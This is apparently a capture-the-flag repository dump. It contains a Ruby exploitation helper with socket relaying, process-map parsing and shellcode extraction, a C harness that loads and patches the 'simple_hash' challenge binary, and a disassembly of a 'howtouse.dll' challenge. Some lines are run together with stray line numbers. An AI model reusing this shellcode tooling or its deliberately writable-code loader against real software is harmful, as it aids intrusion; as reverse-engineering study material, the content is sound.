n 65 | r = read(n) 66 | if !$quiet 67 | STDERR.print(r) 68 | #STDERR.puts ('%02x' * r.size) % r.unpack("c*") 69 | end 70 | r 71 | else 72 | l = gets 73 | STDERR.puts l if !$quiet 74 | l 75 | end 76 | end 77 | 78 | def puts(s) 79 | if s =~ /\n$/ 80 
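write(s)
  else
    write("#{s}\n")
  end
  flush
end

# Inspect each argument and send it to the peer, one per line
# (like Kernel#p, but the target is this IO rather than STDOUT).
def p(*a)
  a.each { |v| puts v.inspect }
end

# Drain whatever is already readable on this IO to STDERR without
# blocking (zero-timeout select).  Stops at EOF instead of handing nil
# to putc, which raised TypeError in the original.
def show_all_buf
  while (ready = IO.select([self], [], [], 0))
    next unless ready[0][0] == self
    ch = self.read(1)
    break if ch.nil?
    STDERR.putc ch
  end
end

# Read one byte at a time until +reg+ matches the accumulated buffer and
# return the MatchData.  Echoes to STDERR unless $quiet.
# Raises EOFError if the peer closes first (the original died with an
# unhelpful TypeError from `b += nil`).
def wait_until(reg)
  buf = ''
  loop do
    ch = self.read(1)
    if ch.nil?
      raise EOFError, "EOF while waiting for #{reg.inspect}; got #{buf.inspect}"
    end
    STDERR.putc ch unless $quiet
    buf << ch
    return $~ if reg =~ buf
  end
end

# Relay between the terminal and this IO until either side closes:
# bytes from the peer go to STDOUT, lines typed on STDIN go to the peer.
def interactive
  STDOUT.puts 'INTERACTIVE!'
  begin
    loop do
      ready = IO.select([self, STDIN], [], [])
      if ready[0][0] == self
        ch = self.read(1)
        if ch.nil?
          STDOUT.puts 'Connection closed (read)'
          return
        end
        STDOUT.putc ch
      else
        # FIX: the original read `else r[0][0] == STDIN`, i.e. a plain
        # `else` followed by a discarded comparison, not an `elsif`.
        # Also stop on STDIN EOF: gets returns nil there, and the old
        # code then pushed "\n" to the peer in a tight loop forever.
        input = STDIN.gets
        if input.nil?
          STDOUT.puts 'Connection closed (stdin)'
          return
        end
        self.puts(input)
      end
    end
  rescue
    # Pass strings, not the Exception / Array themselves: this file's
    # IO#puts override does `s =~ /\n$/`, and Object#=~ no longer exists
    # on Ruby >= 3.2, so the old lines raised NoMethodError inside rescue.
    STDOUT.puts $!.message
    STDOUT.puts $!.backtrace.join("\n")
    STDOUT.puts ''
    STDOUT.puts 'output:'
    STDOUT.puts self.read
  end
end
end

# Contents of /proc/PID/maps.  Accepts the IO returned by popen: waits
# briefly for the child to start, then uses its pid.
def proc_map(pid)
  if pid.is_a?(IO)
    IO.select([pid], [], [], 0.03)
    return proc_map(pid.pid)
  end

  File.read("/proc/#{pid}/maps")
end

# Parsed view of a process's memory map as [name, addr_range, perms] rows.
class ProcMap
  def initialize(pid)
    @maps = []
    anon_id = 0
    proc_map(pid).each_line do |line|
      toks = line.split
      # unnamed mappings get a synthetic, unique name so they can be
      # matched by regexp just like file-backed ones
      name = toks[5]
      unless name
        name = "*anonymous_#{anon_id}*"
        anon_id += 1
      end

      lo, hi = toks[0].split('-').map(&:hex)
      @maps << [name, Range.new(lo, hi, true), toks[1]]
    end
  end

  def get_range(reg)
    first = nil
    last = nil
    @maps.each do |name, range, prot|
      if reg =~ name
        if !first || first > range.first
          first = range.first
        end
        if !last || last < range.last
          last = range.last
        end
      end
    end

    if !first ||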
!last 186 | raise "Missing first or last: #{first} - #{last}" 187 | end 188 | 189 | Range.new(first, last, true) 190 | end 191 | end 192 | 193 | class Range 194 | def addr_str 195 | '%x-%x' % [first, last] 196 | end 197 | end 198 | 199 | def shellcode_from_dump(dump) 200 | dump = dump.gsub(/^\s*\h+:/, '') 201 | sc = '' 202 | dump.scan(/^\s*((\h{2}\s)+)/) do 203 | sc += $1.split.map{|h|h.hex.chr} * '' 204 | end 205 | 206 | if i = sc.index("\0") 207 | STDERR.puts "WARNING: NULL in shellcode at #{i}" 208 | end 209 | if i = sc.index("\n") 210 | STDERR.puts "WARNING: linebreak in shellcode at #{i}" 211 | end 212 | STDERR.puts "shellcode size: #{sc.size}" 213 | 214 | sc 215 | end 216 | 217 | if ARGV[0] == '-p' 218 | $prod = true 219 | ARGV.shift 220 | end 221 | if ARGV[0] == '-g' 222 | $gdb = true 223 | ARGV.shift 224 | end 225 | 226 | # from http://rosettacode.org/wiki/Modular_inverse#Ruby 227 | 228 | def extended_gcd(a, b) 229 | last_remainder, remainder = a.abs, b.abs 230 | x, last_x, y, last_y = 0, 1, 1, 0 231 | while remainder != 0 232 | last_remainder, (quotient, remainder) = remainder, last_remainder.divmod(remainder) 233 | x, last_x = last_x - quotient*x, x 234 | y, last_y = last_y - quotient*y, y 235 | end 236 | 237 | return last_remainder, last_x * (a < 0 ? -1 : 1) 238 | end 239 | 240 | def invmod(e, et) 241 | g, x = extended_gcd(e, et) 242 | if g != 1 243 | raise 'Teh maths are broken!' 244 | end 245 | x % et 246 | end 247 | -------------------------------------------------------------------------------- /sh.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | //#define fprintf(...) 17 | #define LOG(...) fprintf(stderr, __VA_ARGS__) 18 | //#define LOG(...) 
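typedef long long (*mm_fn)(long long, long long);
/* Address of the target binary's modular-multiply routine.  Every
 * absolute address in this file belongs to the `simple_hash` ELF that
 * main() opens below; nothing here is a general-purpose loader. */
mm_fn mm = (mm_fn)0x080487ec;

/* Tracing wrapper that main() patches in over the call at 0x8048963. */
long long mm_wrap(long long a, long long b) {
  printf("mm: %lld %lld\n", a, b);
  return mm(a, b);
}

/* Sink for symbols that could not be resolved: a call through such a
 * slot aborts loudly instead of jumping to NULL. */
void undefined() {
  fprintf(stderr, "undefined function is called\n");
  abort();
}

/* Print a message and exit.  The original called error("msg") with a
 * single argument; glibc's error(3) is error(int status, int errnum,
 * const char *fmt, ...), so that call would pass the string as the exit
 * status and read garbage for the format.  The original includes were
 * lost in extraction, so whichever error() was meant, a local helper is
 * unambiguous. */
static void die(const char* msg) {
  fprintf(stderr, "fatal: %s\n", msg);
  exit(1);
}

/* Read exactly len bytes from fd into buf, or die.  read(2) may return
 * short; the original used a single unchecked call. */
static void read_all(int fd, char* buf, int len) {
  int off = 0;
  while (off < len) {
    ssize_t n = read(fd, buf + off, len - off);
    if (n <= 0)
      die("read(elf): short read or error");
    off += (int)n;
  }
}

/* PT_LOAD: mmap one segment at its fixed virtual address.
 * ph points at the Elf32_Phdr viewed as eight 32-bit words. */
static void load_segment(int fd, const int* ph) {
  int poff = ph[1];
  int paddr = ph[2];
  int pfsize = ph[4];
  int psize = ph[5];
  int pflag = ph[6];
  int pafsize;
  int prot = 0;

  if (pflag & 1) prot |= PROT_EXEC;
  if (pflag & 2) prot |= PROT_WRITE;
  if (pflag & 4) prot |= PROT_READ;
  /* SECURITY: text is mapped W+X on purpose.  main() patches the call at
   * 0x8048963 and the string at 0x80491a0 inside the loaded image.  That
   * is acceptable for a throwaway harness driving one known binary; do
   * not reuse this loader for anything that takes untrusted input. */
  if (prot & PROT_EXEC)
    prot |= PROT_WRITE;

  /* page-align: pull the start back to a page boundary, grow both sizes
   * by the same amount, then round the sizes up to whole pages */
  psize += paddr & 0xfff;
  pfsize += paddr & 0xfff;
  poff -= paddr & 0xfff;
  paddr &= ~0xfff;
  pafsize = (pfsize + 0xfff) & ~0xfff;
  psize = (psize + 0xfff) & ~0xfff;
  LOG("PT_LOAD size=%d fsize=%d flag=%d addr=%x prot=%d poff=%d\n",
      psize, pafsize, pflag, paddr, prot, poff);
  if (mmap((void*)paddr, pafsize, prot, MAP_FILE|MAP_PRIVATE|MAP_FIXED,
           fd, poff) == MAP_FAILED)
    die("mmap(file)");

  if (prot & PROT_WRITE) {
    LOG("%p\n", (char*)paddr);
    /* zero the file-backed tail past p_filesz (the original did this
     * byte by byte), then back the rest of p_memsz (.bss) with
     * anonymous pages */
    memset((char*)paddr + pfsize, 0, pafsize - pfsize);
    pfsize = pafsize;
    if (pfsize != psize) {
      if (mmap((void*)(paddr + pfsize), psize - pfsize, prot,
               MAP_ANON|MAP_PRIVATE, -1, 0) == MAP_FAILED)
        die("mmap(anon)");
    }
  }
}

/* Resolve a symbol name the way the original did: the stdio globals are
 * special-cased (the target may refer to them under either name), and
 * everything else goes through dlsym in the global namespace. */
static void* resolve(const char* sname) {
  if (!strcmp(sname, "stdout")) return &stdout;
  if (!strcmp(sname, "_Stdout")) return stdout;
  if (!strcmp(sname, "stderr")) return &stderr;
  if (!strcmp(sname, "_Stderr")) return stderr;
  /* else if (!strcmp(sname, "__environ")) return &environ; */
  return dlsym(RTLD_DEFAULT, sname);
}

/* Apply one table of Elf32_Rel entries.  tag is "" for .rel.dyn and
 * "plt" for .rel.plt (only used in the log line). */
static void apply_relocs(const char* tag, char* rel, int relsz, int relent,
                         const char* dsym, const char* dstr) {
  int i;
  for (i = 0; i < relsz; rel += relent, i += relent) {
    int* addr = *(int**)rel;
    int info = *(int*)(rel + 4);
    int sym = info >> 8;
    int type = info & 0xff;
    /* Elf32_Sym is 16 bytes and st_name is its first word.  Neither sym
     * nor the string offset is bounds-checked: the input is assumed to
     * be the known, trusted target binary. */
    const int* ds = (const int*)(dsym + 16 * sym);
    const char* sname = dstr + *ds;
    void* val = resolve(sname);
    int resolved = val != NULL;

    LOG("%srel: %p %s(%d) %d => %p\n",
        tag, (void*)addr, sname, sym, type, val);

    /* unresolved symbols point at the trap so a stray call aborts
     * instead of jumping to NULL */
    if (!val)
      val = (void*)&undefined;

    /* Every case now ends in break.  The original fell through from
     * R_386_32 into R_386_COPY into R_386_GLOB_DAT, so a type-1 or
     * type-5 entry was finally overwritten with a plain `*addr = val`,
     * and its "undefined" messages were unreachable because val had
     * already been replaced by &undefined. */
    switch (type) {
    case 1: /* R_386_32: S + A (the addend is the word already there) */
      *addr += (int)val;
      break;
    case 5: /* R_386_COPY: copy the object's initial value */
      if (resolved)
        *addr = *(int*)val;
      else
        fprintf(stderr, "undefined: %s\n", sname);
      break;
    case 6: /* R_386_GLOB_DAT */
      if (!resolved)
        fprintf(stderr, "undefined data %s\n", sname);
      *addr = (int)val;
      break;
    case 7: /* R_386_JMP_SLOT */
      *addr = (int)val;
      break;
    default:
      fprintf(stderr, "unhandled reloc type %d for %s\n", type, sname);
      break;
    }
  }
}

/* PT_DYNAMIC: walk the dynamic section, dlopen the DT_NEEDED libraries,
 * then apply .rel.dyn followed by .rel.plt.  dyn points at the first
 * Elf32_Dyn (two 32-bit words: d_tag, d_val) inside the file buffer. */
static void link_dynamic(char* dyn) {
  char* dstr = NULL;
  char* dsym = NULL;
  char* rel = NULL;
  char* jmprel = NULL;
  int pltrel_type = 0;
  int relsz = 0, relent = 0, pltrelsz = 0;
  /* zero-terminated list of DT_NEEDED string-table offsets */
  int needed[999] = {0};
  int* neededp = needed;

  puts("PT_DYNAMIC");
  for (;;) {
    /* d_tag is an Elf32_Sword; the original read only its low 16 bits */
    int dtag = *(int*)dyn;
    int dval = *(int*)(dyn + 4);
    dyn += 8;
    if (dtag == 0) /* DT_NULL */
      break;
    switch (dtag) {
    case 1: /* DT_NEEDED.  The original had no break here and fell into
             * DT_PLTRELSZ, overwriting pltrelsz with a string offset.
             * The array is also bounded now (it was not). */
      if (neededp >= needed + 998)
        die("too many DT_NEEDED entries");
      *neededp++ = dval;
      break;
    case 2: /* DT_PLTRELSZ */
      pltrelsz = dval;
      LOG("pltrelsz: %d\n", pltrelsz);
      break;
    case 5: /* DT_STRTAB */
      dstr = (char*)dval;
      LOG("dstr: %p %s\n", dstr, dstr+1);
      break;
    case 6: /* DT_SYMTAB */
      dsym = (char*)dval;
      LOG("dsym: %p\n", dsym);
      break;
    case 17: /* DT_REL */
      rel = (char*)dval;
      LOG("rel: %p\n", rel);
      break;
    case 18: /* DT_RELSZ */
      relsz = dval;
      LOG("relsz: %d\n", relsz);
      break;
    case 19: /* DT_RELENT */
      relent = dval;
      LOG("relent: %d\n", relent);
      break;
    case 20: /* DT_PLTREL is the *type* of the PLT relocs (17 = DT_REL),
              * not their address; the original stored it as a pointer
              * and later tested `(int)pltrel != 17`. */
      pltrel_type = dval;
      LOG("pltrel: %d\n", pltrel_type);
      break;
    case 23: /* DT_JMPREL: address of .rel.plt (the original logged this
              * tag as unknown and relied on .rel.plt directly following
              * .rel.dyn in memory) */
      jmprel = (char*)dval;
      LOG("jmprel: %p\n", jmprel);
      break;
    default:
      LOG("unknown DYN %d %d\n", dtag, dval);
    }
  }
  if (!dsym || !dstr)
    die("no dsym or dstr");
  if (pltrel_type && pltrel_type != 17)
    die("only DT_REL-style PLT relocations are handled");
  if ((relsz > 0 || pltrelsz > 0) && relent <= 0)
    die("DT_RELENT missing");

  for (neededp = needed; *neededp; neededp++) {
    LOG("needed: %s\n", dstr + *neededp);
    if (!dlopen(dstr + *neededp, RTLD_NOW | RTLD_GLOBAL))
      LOG("dlopen(%s) failed: %s\n", dstr + *neededp, dlerror());
  }

  if (relsz > 0)
    apply_relocs("", rel, relsz, relent, dsym, dstr);
  if (pltrelsz > 0) {
    /* Keep the original's fallback when DT_JMPREL is absent: continue
     * right after .rel.dyn, which is where .rel.plt sat in this binary. */
    char* plt;
    if (jmprel)
      plt = jmprel;
    else if (rel)
      plt = rel + relsz;
    else
      die("DT_JMPREL missing and no DT_REL to continue from");
    apply_relocs("plt", plt, pltrelsz, relent, dsym, dstr);
  }
}

int main(int argc, char* argv[]) {
  int i;
  int fd, len;
  char* elf;
  int entry, phoff, phnum;
  int* ph;

  /* the harness is hard-wired to the target binary; argv is only echoed */
  fd = open("simple_hash", O_RDONLY);
  if (fd < 0)
    die("cannot open simple_hash");
  len = lseek(fd, 0, SEEK_END);
  if (len < 52) /* sizeof(Elf32_Ehdr); every header field read below is inside it */
    die("file too small to be an ELF");
  elf = (char*)malloc(len);
  if (!elf)
    die("malloc");
  lseek(fd, 0, SEEK_SET);
  read_all(fd, elf, len);

  if (*(int*)elf != 0x464c457f) /* "\x7fELF" */
    die("not elf");
  if (*(int*)(elf+16) != 0x30002) /* e_type ET_EXEC (2), e_machine EM_386 (3) */
    die("not i386 exec");

  entry = *(int*)(elf+24);
  phoff = *(int*)(elf+28);
  /* e_phnum is the 16-bit field at offset 44; the original read a 32-bit
   * word at 42 and shifted the upper half down */
  phnum = *(unsigned short*)(elf+44);
  LOG("%x %x %x\n", entry, phoff, phnum);

  /* The program headers, and every offset inside the dynamic section,
   * are trusted as-is; nothing is range-checked against len. */
  ph = (int*)(elf + phoff);
  for (i = 0; i < phnum; i++) {
    switch (ph[0]) {
    case 1: /* PT_LOAD */
      load_segment(fd, ph);
      break;
    case 2: /* PT_DYNAMIC: ph[1] is p_offset into the file buffer */
      link_dynamic(elf + ph[1]);
      break;
    default:
      fprintf(stderr, "unknown PT %d\n", ph[0]);
    }
    ph += 8; /* sizeof(Elf32_Phdr) / sizeof(int) */
  }

  fprintf(stderr, "start!: %s %x\n", argc > 1 ? argv[1] : "(none)", entry);

  /* Everything below is the actual experiment against simple_hash:
   * sanity-check mm() against the expected modulus, hook the call to it
   * with mm_wrap (rel32 patch of the call at 0x8048963 -- the reason text
   * is mapped writable above), plant a known string, run calc_hash().
   * The loaded entry point is never jumped to. */
#define TEST(a, b) printf("%lld*%lld=%lld (%lld)\n", a, b, mm(a, b), a * b % 0x38d7ea4c68025LL)
  TEST(1LL, 2LL);
  TEST(0xdeaddeadULL, 0xdeaddeadULL);

  *(char**)(0x8048963+1) = (char*)mm_wrap - (0x8048963 + 5);

  char* str = (char*)0x80491a0;
  str[0] = 'X';
  str[1] = 'X';
  str[2] = 0;
  long long (*calc_hash)() = (long long (*)())0x08048927;
  printf("%lld\n", calc_hash());

  //run((void*)entry);
  return 0;
}
--------------------------------------------------------------------------------
/howtouse.dmp:
--------------------------------------------------------------------------------

howtouse.dll: file format pei-i386


Disassembly of section .text:

10001000 <.text>:
10001000: b8 01 00 00 00 mov $0x1,%eax
10001005: c2 0c 00 ret $0xc
10001008: cc int3
10001009: cc int3
1000100a: cc int3
1000100b: cc int3
1000100c: cc int3
1000100d: cc int3
1000100e: cc int3
1000100f: cc int3
10001010: b8 61 00 00 00 mov $0x61,%eax
10001015: c3 ret
10001016: cc int3
10001017: cc int3
10001018: cc int3
10001019: cc int3
1000101a: cc int3
1000101b: cc int3
1000101c: cc int3
1000101d: cc int3
1000101e: cc int3
1000101f: cc int3
10001020: b8 62 00 00 00 mov $0x62,%eax
10001025: c3 ret
10001026: cc int3
10001027: cc int3
10001028: cc int3
10001029: cc int3
1000102a: cc int3
1000102b: cc int3
1000102c: cc int3
1000102d: cc int3
1000102e: cc int3
1000102f: cc int3
10001030: b8 63 00 00 00 mov $0x63,%eax
10001035: c3 ret
10001036: cc int3
10001037: cc int3
10001038: cc int3
10001039: cc int3
1000103a: cc int3
1000103b: cc int3
1000103c: cc int3
1000103d: cc int3
1000103e: cc int3
1000103f: cc int3
10001040: b8 64 00 00 00 mov $0x64,%eax
10001045: c3 ret
10001046: cc int3
10001047: cc int3
10001048: cc int3
10001049: cc int3
1000104a: cc int3
1000104b: cc int3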
1000104c: cc int3 63 | 1000104d: cc int3 64 | 1000104e: cc int3 65 | 1000104f: cc int3 66 | 10001050: b8 65 00 00 00 mov $0x65,%eax 67 | 10001055: c3 ret 68 | 10001056: cc int3 69 | 10001057: cc int3 70 | 10001058: cc int3 71 | 10001059: cc int3 72 | 1000105a: cc int3 73 | 1000105b: cc int3 74 | 1000105c: cc int3 75 | 1000105d: cc int3 76 | 1000105e: cc int3 77 | 1000105f: cc int3 78 | 10001060: b8 66 00 00 00 mov $0x66,%eax 79 | 10001065: c3 ret 80 | 10001066: cc int3 81 | 10001067: cc int3 82 | 10001068: cc int3 83 | 10001069: cc int3 84 | 1000106a: cc int3 85 | 1000106b: cc int3 86 | 1000106c: cc int3 87 | 1000106d: cc int3 88 | 1000106e: cc int3 89 | 1000106f: cc int3 90 | 10001070: b8 41 00 00 00 mov $0x41,%eax 91 | 10001075: c3 ret 92 | 10001076: cc int3 93 | 10001077: cc int3 94 | 10001078: cc int3 95 | 10001079: cc int3 96 | 1000107a: cc int3 97 | 1000107b: cc int3 98 | 1000107c: cc int3 99 | 1000107d: cc int3 100 | 1000107e: cc int3 101 | 1000107f: cc int3 102 | 10001080: b8 4d 00 00 00 mov $0x4d,%eax 103 | 10001085: c3 ret 104 | 10001086: cc int3 105 | 10001087: cc int3 106 | 10001088: cc int3 107 | 10001089: cc int3 108 | 1000108a: cc int3 109 | 1000108b: cc int3 110 | 1000108c: cc int3 111 | 1000108d: cc int3 112 | 1000108e: cc int3 113 | 1000108f: cc int3 114 | 10001090: b8 30 00 00 00 mov $0x30,%eax 115 | 10001095: c3 ret 116 | 10001096: cc int3 117 | 10001097: cc int3 118 | 10001098: cc int3 119 | 10001099: cc int3 120 | 1000109a: cc int3 121 | 1000109b: cc int3 122 | 1000109c: cc int3 123 | 1000109d: cc int3 124 | 1000109e: cc int3 125 | 1000109f: cc int3 126 | 100010a0: b8 31 00 00 00 mov $0x31,%eax 127 | 100010a5: c3 ret 128 | 100010a6: cc int3 129 | 100010a7: cc int3 130 | 100010a8: cc int3 131 | 100010a9: cc int3 132 | 100010aa: cc int3 133 | 100010ab: cc int3 134 | 100010ac: cc int3 135 | 100010ad: cc int3 136 | 100010ae: cc int3 137 | 100010af: cc int3 138 | 100010b0: b8 32 00 00 00 mov $0x32,%eax 139 | 100010b5: c3 ret 140 | 100010b6: cc int3 
141 | 100010b7: cc int3 142 | 100010b8: cc int3 143 | 100010b9: cc int3 144 | 100010ba: cc int3 145 | 100010bb: cc int3 146 | 100010bc: cc int3 147 | 100010bd: cc int3 148 | 100010be: cc int3 149 | 100010bf: cc int3 150 | 100010c0: b8 33 00 00 00 mov $0x33,%eax 151 | 100010c5: c3 ret 152 | 100010c6: cc int3 153 | 100010c7: cc int3 154 | 100010c8: cc int3 155 | 100010c9: cc int3 156 | 100010ca: cc int3 157 | 100010cb: cc int3 158 | 100010cc: cc int3 159 | 100010cd: cc int3 160 | 100010ce: cc int3 161 | 100010cf: cc int3 162 | 100010d0: b8 34 00 00 00 mov $0x34,%eax 163 | 100010d5: c3 ret 164 | 100010d6: cc int3 165 | 100010d7: cc int3 166 | 100010d8: cc int3 167 | 100010d9: cc int3 168 | 100010da: cc int3 169 | 100010db: cc int3 170 | 100010dc: cc int3 171 | 100010dd: cc int3 172 | 100010de: cc int3 173 | 100010df: cc int3 174 | 100010e0: b8 37 00 00 00 mov $0x37,%eax 175 | 100010e5: c3 ret 176 | 100010e6: cc int3 177 | 100010e7: cc int3 178 | 100010e8: cc int3 179 | 100010e9: cc int3 180 | 100010ea: cc int3 181 | 100010eb: cc int3 182 | 100010ec: cc int3 183 | 100010ed: cc int3 184 | 100010ee: cc int3 185 | 100010ef: cc int3 186 | 100010f0: b8 38 00 00 00 mov $0x38,%eax 187 | 100010f5: c3 ret 188 | 100010f6: cc int3 189 | 100010f7: cc int3 190 | 100010f8: cc int3 191 | 100010f9: cc int3 192 | 100010fa: cc int3 193 | 100010fb: cc int3 194 | 100010fc: cc int3 195 | 100010fd: cc int3 196 | 100010fe: cc int3 197 | 100010ff: cc int3 198 | 10001100: b8 39 00 00 00 mov $0x39,%eax 199 | 10001105: c3 ret 200 | 10001106: cc int3 201 | 10001107: cc int3 202 | 10001108: cc int3 203 | 10001109: cc int3 204 | 1000110a: cc int3 205 | 1000110b: cc int3 206 | 1000110c: cc int3 207 | 1000110d: cc int3 208 | 1000110e: cc int3 209 | 1000110f: cc int3 210 | 10001110: b8 7b 00 00 00 mov $0x7b,%eax 211 | 10001115: c3 ret 212 | 10001116: cc int3 213 | 10001117: cc int3 214 | 10001118: cc int3 215 | 10001119: cc int3 216 | 1000111a: cc int3 217 | 1000111b: cc int3 218 | 1000111c: cc int3 
219 | 1000111d: cc int3 220 | 1000111e: cc int3 221 | 1000111f: cc int3 222 | 10001120: b8 7d 00 00 00 mov $0x7d,%eax 223 | 10001125: c3 ret 224 | 10001126: cc int3 225 | 10001127: cc int3 226 | 10001128: cc int3 227 | 10001129: cc int3 228 | 1000112a: cc int3 229 | 1000112b: cc int3 230 | 1000112c: cc int3 231 | 1000112d: cc int3 232 | 1000112e: cc int3 233 | 1000112f: cc int3 234 | 10001130: 81 ec b4 00 00 00 sub $0xb4,%esp 235 | 10001136: b8 80 10 00 10 mov $0x10001080,%eax 236 | 1000113b: 89 04 24 mov %eax,(%esp) 237 | 1000113e: 89 44 24 04 mov %eax,0x4(%esp) 238 | 10001142: b8 90 10 00 10 mov $0x10001090,%eax 239 | 10001147: 89 44 24 24 mov %eax,0x24(%esp) 240 | 1000114b: 89 44 24 30 mov %eax,0x30(%esp) 241 | 1000114f: 89 44 24 34 mov %eax,0x34(%esp) 242 | 10001153: 56 push %esi 243 | 10001154: b8 a0 10 00 10 mov $0x100010a0,%eax # 1 244 | 10001159: ba 30 10 00 10 mov $0x10001030,%edx # c 245 | 1000115e: 57 push %edi 246 | 1000115f: bf e0 10 00 10 mov $0x100010e0,%edi # 7 247 | 10001164: b9 00 11 00 10 mov $0x10001100,%ecx # 9 248 | 10001169: 89 44 24 40 mov %eax,0x40(%esp) 249 | 1000116d: 89 44 24 54 mov %eax,0x54(%esp) 250 | 10001171: b8 50 10 00 10 mov $0x10001050,%eax # e 251 | 10001176: be 40 10 00 10 mov $0x10001040,%esi # d 252 | 1000117b: 89 54 24 1c mov %edx,0x1c(%esp) # c 253 | 1000117f: 89 54 24 30 mov %edx,0x30(%esp) 254 | 10001183: 89 54 24 48 mov %edx,0x48(%esp) 255 | 10001187: ba f0 10 00 10 mov $0x100010f0,%edx 256 | 1000118c: 89 7c 24 20 mov %edi,0x20(%esp) 257 | 10001190: 89 7c 24 50 mov %edi,0x50(%esp) 258 | 10001194: 89 7c 24 64 mov %edi,0x64(%esp) 259 | 10001198: 89 44 24 7c mov %eax,0x7c(%esp) 260 | 1000119c: 89 84 24 80 00 00 00 mov %eax,0x80(%esp) 261 | 100011a3: 89 bc 24 84 00 00 00 mov %edi,0x84(%esp) 262 | 100011aa: 89 84 24 88 00 00 00 mov %eax,0x88(%esp) 263 | 100011b1: 89 84 24 98 00 00 00 mov %eax,0x98(%esp) 264 | 100011b8: 89 84 24 ac 00 00 00 mov %eax,0xac(%esp) 265 | 100011bf: 8b 84 24 c0 00 00 00 mov 0xc0(%esp),%eax 266 | 
100011c6: 89 74 24 24 mov %esi,0x24(%esp) 267 | 100011ca: 89 74 24 68 mov %esi,0x68(%esp) 268 | 100011ce: 89 74 24 74 mov %esi,0x74(%esp) 269 | 100011d2: 89 b4 24 b0 00 00 00 mov %esi,0xb0(%esp) 270 | 100011d9: 5f pop %edi 271 | 100011da: c7 44 24 0c 70 10 00 movl $0x10001070,0xc(%esp) 272 | 100011e1: 10 273 | 100011e2: c7 44 24 10 10 11 00 movl $0x10001110,0x10(%esp) 274 | 100011e9: 10 275 | 100011ea: c7 44 24 14 60 10 00 movl $0x10001060,0x14(%esp) 276 | 100011f1: 10 277 | 100011f2: 89 4c 24 24 mov %ecx,0x24(%esp) 278 | 100011f6: c7 44 24 30 10 10 00 movl $0x10001010,0x30(%esp) 279 | 100011fd: 10 280 | 100011fe: c7 44 24 40 60 10 00 movl $0x10001060,0x40(%esp) 281 | 10001205: 10 282 | 10001206: 89 54 24 48 mov %edx,0x48(%esp) 283 | 1000120a: c7 44 24 54 b0 10 00 movl $0x100010b0,0x54(%esp) 284 | 10001211: 10 285 | 10001212: c7 44 24 58 d0 10 00 movl $0x100010d0,0x58(%esp) 286 | 10001219: 10 287 | 1000121a: 89 4c 24 5c mov %ecx,0x5c(%esp) 288 | 1000121e: 89 54 24 68 mov %edx,0x68(%esp) 289 | 10001222: 89 54 24 6c mov %edx,0x6c(%esp) 290 | 10001226: 89 4c 24 74 mov %ecx,0x74(%esp) 291 | 1000122a: c7 84 24 88 00 00 00 movl $0x10001060,0x88(%esp) 292 | 10001231: 60 10 00 10 293 | 10001235: c7 84 24 8c 00 00 00 movl $0x10001010,0x8c(%esp) 294 | 1000123c: 10 10 00 10 295 | 10001240: 89 8c 24 90 00 00 00 mov %ecx,0x90(%esp) 296 | 10001247: 89 8c 24 98 00 00 00 mov %ecx,0x98(%esp) 297 | 1000124e: c7 84 24 9c 00 00 00 movl $0x10001020,0x9c(%esp) 298 | 10001255: 20 10 00 10 299 | 10001259: c7 84 24 a0 00 00 00 movl $0x100010c0,0xa0(%esp) 300 | 10001260: c0 10 00 10 301 | 10001264: c7 84 24 a4 00 00 00 movl $0x100010b0,0xa4(%esp) 302 | 1000126b: b0 10 00 10 303 | 1000126f: 89 94 24 b0 00 00 00 mov %edx,0xb0(%esp) 304 | 10001276: c7 84 24 b4 00 00 00 movl $0x10001120,0xb4(%esp) 305 | 1000127d: 20 11 00 10 306 | 10001281: 8b 4c 84 04 mov 0x4(%esp,%eax,4),%ecx 307 | 10001285: 5e pop %esi 308 | 10001286: 81 c4 b4 00 00 00 add $0xb4,%esp 309 | 1000128c: ff e1 jmp *%ecx 310 | 
1000128e: 3b 0d 00 30 00 10 cmp 0x10003000,%ecx 311 | 10001294: 75 02 jne 0x10001298 312 | 10001296: f3 c3 repz ret 313 | 10001298: e9 ae 03 00 00 jmp 0x1000164b 314 | 1000129d: 8b ff mov %edi,%edi 315 | 1000129f: 56 push %esi 316 | 100012a0: 68 80 00 00 00 push $0x80 317 | 100012a5: ff 15 70 20 00 10 call *0x10002070 318 | 100012ab: 8b f0 mov %eax,%esi 319 | 100012ad: 56 push %esi 320 | 100012ae: ff 15 78 20 00 10 call *0x10002078 321 | 100012b4: 59 pop %ecx 322 | 100012b5: 59 pop %ecx 323 | 100012b6: a3 5c 33 00 10 mov %eax,0x1000335c 324 | 100012bb: a3 58 33 00 10 mov %eax,0x10003358 325 | 100012c0: 85 f6 test %esi,%esi 326 | 100012c2: 75 05 jne 0x100012c9 327 | 100012c4: 33 c0 xor %eax,%eax 328 | 100012c6: 40 inc %eax 329 | 100012c7: 5e pop %esi 330 | 100012c8: c3 ret 331 | 100012c9: 83 26 00 andl $0x0,(%esi) 332 | 100012cc: e8 48 05 00 00 call 0x10001819 333 | 100012d1: 68 3f 18 00 10 push $0x1000183f 334 | 100012d6: e8 27 05 00 00 call 0x10001802 335 | 100012db: c7 04 24 51 17 00 10 movl $0x10001751,(%esp) 336 | 100012e2: e8 1b 05 00 00 call 0x10001802 337 | 100012e7: 59 pop %ecx 338 | 100012e8: 33 c0 xor %eax,%eax 339 | 100012ea: 5e pop %esi 340 | 100012eb: c3 ret 341 | 100012ec: 8b ff mov %edi,%edi 342 | 100012ee: 55 push %ebp 343 | 100012ef: 8b ec mov %esp,%ebp 344 | 100012f1: 51 push %ecx 345 | 100012f2: 51 push %ecx 346 | 100012f3: 33 c0 xor %eax,%eax 347 | 100012f5: 39 45 0c cmp %eax,0xc(%ebp) 348 | 100012f8: 75 0e jne 0x10001308 349 | 100012fa: 39 05 10 30 00 10 cmp %eax,0x10003010 350 | 10001300: 7e 3c jle 0x1000133e 351 | 10001302: ff 0d 10 30 00 10 decl 0x10003010 352 | 10001308: 83 7d 0c 01 cmpl $0x1,0xc(%ebp) 353 | 1000130c: 8b 0d 54 20 00 10 mov 0x10002054,%ecx 354 | 10001312: 8b 09 mov (%ecx),%ecx 355 | 10001314: 53 push %ebx 356 | 10001315: 56 push %esi 357 | 10001316: 57 push %edi 358 | 10001317: 89 0d 4c 33 00 10 mov %ecx,0x1000334c 359 | 1000131d: 0f 85 d4 00 00 00 jne 0x100013f7 360 | 10001323: 64 8b 0d 18 00 00 00 mov %fs:0x18,%ecx 361 | 
